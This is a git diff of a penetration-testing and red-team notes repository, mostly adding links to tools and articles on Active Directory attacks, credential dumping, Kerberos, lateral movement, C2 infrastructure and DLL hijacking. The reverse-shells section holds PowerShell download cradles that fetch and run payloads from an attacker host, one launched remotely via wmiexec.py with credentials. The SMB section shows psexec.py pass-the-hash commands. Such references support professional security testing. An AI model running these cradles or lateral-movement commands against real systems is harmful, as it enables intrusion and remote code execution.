diff --git a/pentest/infrastructure/ad/README.md b/pentest/infrastructure/ad/README.md
index 2e1a3a6..c89a638 100644
--- a/pentest/infrastructure/ad/README.md
+++ b/pentest/infrastructure/ad/README.md
@@ -61,6 +61,7 @@
 - [GOAD - part 10 - Delegations](https://mayfly277.github.io/posts/GOADv2-pwning-part10/)
 - [GOAD - part 11 - ACL](https://mayfly277.github.io/posts/GOADv2-pwning-part11/)
 - [GOAD - part 12 - Trusts](https://mayfly277.github.io/posts/GOADv2-pwning-part12/)
+- [GOAD - part 13 - Having fun inside a domain](https://mayfly277.github.io/posts/GOADv2-pwning-part13/)
 - [https://github.com/Orange-Cyberdefense/GOAD](https://github.com/Orange-Cyberdefense/GOAD)
@@ -433,6 +434,7 @@ PV3 > Get-DomainGPO -Name "" -Properties DisplayName
 * [https://github.com/maaaaz/impacket-examples-windows](https://github.com/maaaaz/impacket-examples-windows)
 * [https://github.com/icyguider/MoreImpacketExamples](https://github.com/icyguider/MoreImpacketExamples)
 * [https://tools.thehacker.recipes/impacket](https://tools.thehacker.recipes/impacket)
+* [https://www.synacktiv.com/en/publications/traces-of-windows-remote-command-execution.html](https://www.synacktiv.com/en/publications/traces-of-windows-remote-command-execution.html)
 * [https://habr.com/ru/post/703332/](https://habr.com/ru/post/703332/)
 Install:
diff --git a/pentest/infrastructure/ad/credential-harvesting/README.md b/pentest/infrastructure/ad/credential-harvesting/README.md
index 668f03e..546e593 100644
--- a/pentest/infrastructure/ad/credential-harvesting/README.md
+++ b/pentest/infrastructure/ad/credential-harvesting/README.md
@@ -1,5 +1,7 @@
 # Credentials Harvesting
+- [https://www.synacktiv.com/publications/windows-secrets-extraction-a-summary](https://www.synacktiv.com/publications/windows-secrets-extraction-a-summary)
+
diff --git a/pentest/infrastructure/ad/credential-harvesting/lsa.md b/pentest/infrastructure/ad/credential-harvesting/lsa.md
index 355a02b..aa941b4 100644
--- a/pentest/infrastructure/ad/credential-harvesting/lsa.md
+++ b/pentest/infrastructure/ad/credential-harvesting/lsa.md
@@ -6,6 +6,7 @@ description: Local Security Authority
 * [https://www.passcape.com/index.php?section=docsys&cmd=details&id=23](https://www.passcape.com/index.php?section=docsys&cmd=details&id=23)
 * [https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets)
+* [https://github.com/laxa/SharpSecretsdump](https://github.com/laxa/SharpSecretsdump)
diff --git a/pentest/infrastructure/ad/kerberos/README.md b/pentest/infrastructure/ad/kerberos/README.md
index 9770306..348d358 100644
--- a/pentest/infrastructure/ad/kerberos/README.md
+++ b/pentest/infrastructure/ad/kerberos/README.md
@@ -68,6 +68,7 @@ python3 keytab.py keytab.kt
 - [https://github.com/OtterHacker/Cerbere](https://github.com/OtterHacker/Cerbere)
 - [https://xakep.ru/2023/04/04/no-mimikatz/](https://xakep.ru/2023/04/04/no-mimikatz/)
 - [https://github.com/MzHmO/articles/tree/main/Ticket%20Injector](https://github.com/MzHmO/articles/tree/main/Ticket%20Injector)
+- [https://github.com/MzHmO/PowershellKerberos](https://github.com/MzHmO/PowershellKerberos)
diff --git a/pentest/infrastructure/ad/lateral-movement/rpc.md b/pentest/infrastructure/ad/lateral-movement/rpc.md
index 9541c73..dfcf42d 100644
--- a/pentest/infrastructure/ad/lateral-movement/rpc.md
+++ b/pentest/infrastructure/ad/lateral-movement/rpc.md
@@ -5,6 +5,7 @@ description: Remote Procedure Call
 # RPC
 - [https://sensepost.com/blog/2021/building-an-offensive-rpc-interface/](https://sensepost.com/blog/2021/building-an-offensive-rpc-interface/)
+- [https://github.com/s0i37/lateral](https://github.com/s0i37/lateral)
diff --git a/pentest/infrastructure/ad/lateral-movement/smb.md b/pentest/infrastructure/ad/lateral-movement/smb.md
index fa14d78..f5a70c4 100644
--- a/pentest/infrastructure/ad/lateral-movement/smb.md
+++ b/pentest/infrastructure/ad/lateral-movement/smb.md
@@ -20,3 +20,11 @@ description: Server Message Block
 $ psexec.py snovvcrash:'Passw0rd!'@192.168.11.1
 $ rlwrap -cAr psexec.py -hashes :fc525c9683e8fe067095ba2ddc971889 megacorp.local/snovvcrash@192.168.11.1 powershell
 ```
+
+
+
+
+## SMB Pivoting
+
+- [https://habr.com/ru/articles/460659/](https://habr.com/ru/articles/460659/)
+- [https://github.com/mis-team/rsockspipe](https://github.com/mis-team/rsockspipe)
diff --git a/pentest/infrastructure/networks/scanning.md b/pentest/infrastructure/networks/scanning.md
index 7170bb5..fa7f65a 100644
--- a/pentest/infrastructure/networks/scanning.md
+++ b/pentest/infrastructure/networks/scanning.md
@@ -487,6 +487,16 @@ $ python3 gateway-finder-imp.py -D file_with_dst_IPs.txt -M file_with_nex_hop_MA
+### tracebuster
+
+- [https://github.com/s0i37/net/blob/main/tracebuster.py](https://github.com/s0i37/net/blob/main/tracebuster.py)
+
+```
+$ python3 tracebuster.py 4 udp 192.168.1.0/24 53 2>/dev/null
+```
+
+
+
 ### NetBIOS
diff --git a/pentest/shells/reverse-shells.md b/pentest/shells/reverse-shells.md
index 798bf68..5068a63 100644
--- a/pentest/shells/reverse-shells.md
+++ b/pentest/shells/reverse-shells.md
@@ -124,9 +124,9 @@ $stream.Dispose()
 - [https://github.com/mdsecactivebreach/PowerDNS](https://github.com/mdsecactivebreach/PowerDNS)
 ```
-'powershell $a=""""http://10.10.13.37/payload.txt"""";iex(Resolve-DnsName """"cradle.megacorp.com"""" 16).Strings[0]'
+'powershell $a=""""http://10.10.13.37/payload.txt"""";iex(Resolve-DnsName """"cradle.attacker.com"""" 16).Strings[0]'
-wmiexec.py -silentcommand -nooutput megacorp.local/snovvcrash:'Passw0rd!'@PC01.megacorp.local 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $url=""""http://10.10.13.37/run.ps1"""";iex(resolve-dnsname """"cradle.megacorp.com"""" 16).strings[0];Invoke-RunPayload http://10.10.13.37/payload.txt'
+wmiexec.py -silentcommand -nooutput megacorp.local/snovvcrash:'Passw0rd!'@PC01.megacorp.local 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $url=""""http://10.10.13.37/run.ps1"""";iex(resolve-dnsname """"cradle.attacker.com"""" 16).strings[0];Invoke-RunPayload http://10.10.13.37/payload.txt'
 ```
diff --git a/redteam/infrastructure.md b/redteam/infrastructure.md
index 9c76b60..9f25570 100644
--- a/redteam/infrastructure.md
+++ b/redteam/infrastructure.md
@@ -2,6 +2,7 @@
 - [https://ditrizna.medium.com/design-and-setup-of-c2-traffic-redirectors-ec3c11bd227d](https://ditrizna.medium.com/design-and-setup-of-c2-traffic-redirectors-ec3c11bd227d)
 - [https://byt3bl33d3r.substack.com/p/taking-the-pain-out-of-c2-infrastructure-3c4](https://byt3bl33d3r.substack.com/p/taking-the-pain-out-of-c2-infrastructure-3c4)
+- [https://rastamouse.me/sharpc2-https-with-redirector/](https://rastamouse.me/sharpc2-https-with-redirector/)
 - [https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki](https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki)
 - [https://github.com/mgeeky/RedWarden](https://github.com/mgeeky/RedWarden)
 - [[PDF] Orchestrating Resilient Red Team Operations (Yiannis Ioannides)](https://github.com/secgroundzero/BSides-Cyprus-2019/blob/master/bsides_Cyprus_Yiannis.pdf)
@@ -285,8 +286,8 @@ Install from apt:
 ```
 $ sudo apt install debian-keyring debian-archive-keyring apt-transport-https -y
-$ curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/gpg.key' | sudo tee /etc/apt/trusted.gpg.d/caddy-stable.asc
-$ curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt' | sudo tee /etc/apt/sources.list.d/caddy-stable.list
+$ curl -1sLf https://dl.cloudsmith.io/public/caddy/stable/gpg.key | sudo tee /etc/apt/trusted.gpg.d/caddy-stable.asc
+$ curl -1sLf https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt | sudo tee /etc/apt/sources.list.d/caddy-stable.list
 $ sudo apt update
 $ sudo apt install caddy -y
 ```
@@ -324,6 +325,7 @@ Config sample to act as a reverse proxy:
 log
 #debug
 admin off
+ #default_sni example.com
 #auto_https disable_redirects
 }
diff --git a/redteam/maldev/dll-hijacking.md b/redteam/maldev/dll-hijacking.md
index a0a9824..56cbf6a 100644
--- a/redteam/maldev/dll-hijacking.md
+++ b/redteam/maldev/dll-hijacking.md
@@ -47,6 +47,8 @@ PS > python .\PackMyPayload.py .\out\ .\out\a.iso --out-format iso --hide OneDri
 ## Tools
+- [https://github.com/monoxgas/Koppeling](https://github.com/monoxgas/Koppeling)
+- [https://github.com/Flangvik/SharpDllProxy](https://github.com/Flangvik/SharpDllProxy)
 - [https://github.com/tothi/dll-hijack-by-proxying](https://github.com/tothi/dll-hijack-by-proxying)